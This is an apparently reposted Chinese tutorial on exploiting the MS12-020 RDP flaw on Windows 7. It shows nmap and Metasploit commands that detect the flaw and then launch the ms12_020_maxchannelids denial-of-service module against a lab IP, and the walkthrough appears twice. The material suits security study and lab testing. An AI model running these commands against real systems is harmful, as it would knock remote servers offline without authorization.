Win7下 MS12_020 漏洞利用
来源:互联网 发布:ubuntu搭建翻墙服务器 编辑:程序博客网 时间:2024/05/16 07:09
service postgresql start
1. nmap
root@MiWiFi-R1CL-srv:~# cd /usr/share/nmap/scripts/
root@MiWiFi-R1CL-srv:/usr/share/nmap/scripts# ls |grep rdp
http-wordpress-brute.nse
http-wordpress-enum.nse
http-wordpress-users.nse
rdp-enum-encryption.nse
rdp-vuln-ms12-020.nse
2. nmap -vv --open -p 3389 --script=rdp-vuln-ms12-020 192.168.159.128
3. msfconsole
search ms12-020
(1) 漏洞检测
msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set rhosts 192.168.159.128 设置远程ip
msf auxiliary(ms12_020_check) > show options 查看配置
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.159.128 yes The target address range or CIDR identifier
RPORT 3389 yes Remote port running RDP (TCP)
THREADS 1 yes The number of concurrent threads
msf auxiliary(ms12_020_check) > run
[+] 192.168.159.128:3389 - 192.168.159.128:3389 - The target is vulnerable. 漏洞存在
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
(2) 漏洞攻击
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.159.128 设置远程ip
rhost => 192.168.159.128
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > run
1. nmap
root@MiWiFi-R1CL-srv:~# cd /usr/share/nmap/scripts/
root@MiWiFi-R1CL-srv:/usr/share/nmap/scripts# ls |grep rdp
http-wordpress-brute.nse
http-wordpress-enum.nse
http-wordpress-users.nse
rdp-enum-encryption.nse
rdp-vuln-ms12-020.nse
2. nmap -vv --open -p 3389 --script=rdp-vuln-ms12-020 192.168.159.128
3. msfconsole
search ms12-020
(1) 漏洞检测
msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set rhosts 192.168.159.128 设置远程ip
msf auxiliary(ms12_020_check) > show options 查看配置
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.159.128 yes The target address range or CIDR identifier
RPORT 3389 yes Remote port running RDP (TCP)
THREADS 1 yes The number of concurrent threads
msf auxiliary(ms12_020_check) > run
[+] 192.168.159.128:3389 - 192.168.159.128:3389 - The target is vulnerable. 漏洞存在
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
(2) 漏洞攻击
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.159.128 设置远程ip
rhost => 192.168.159.128
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > run
阅读全文
0 0
- Win7下 MS12_020 漏洞利用
- win7下模拟溢出漏洞利用shellcode弹出计算器
- kali linux ms12_020漏洞导致目标机器蓝屏
- Linux下溢出漏洞利用学习
- 关于 Metasploitable2 下的 unreal_ircd_3281_backdoor漏洞利用
- Win7下利用Diskpart分区
- win7 下不成功的一次堆栈漏洞溢出
- XP下利用VS2005开发WIN7应用程序
- win7下利用mingw32编译gtest
- win7下利用虚拟机安装ubuntu
- win7下利用DockerToolBox安装Docker步骤
- Linux下堆漏洞利用(off-by-one)
- 关于 WinXP SP2 下的 ChunkSize漏洞利用
- 关于 WinXP SP2 下的 MIDI 漏洞利用
- 关于 WinXP SP2 下的 CVE-2014-8636 漏洞利用
- CGI漏洞利用
- XMLHTTP漏洞利用
- Tomcat漏洞利用
- CCF中学生程序设计在线评测系统(C語言練習用)
- 不同颜色不同饱和度获取
- ActiveMQ官方文档地址说明
- mvn clean install 与 mvn install 的区别
- NOIP复赛复习(八)STL算法与树结构模板
- Win7下 MS12_020 漏洞利用
- socket编程注意事项
- 教程篇(5.4) NSE4 07. 基础 IPsec VPN ❀ 飞塔 (Fortinet) 网络安全专家
- WINDOWS 安装RAC
- 1
- java 面向对象的三大特性
- Linux 中如何复制和删除文件夹中的所有文件?
- HDU 2141 Can you find it?(二分)
- laravel报错:TokenMismatchException in VerifyCsrfToken.php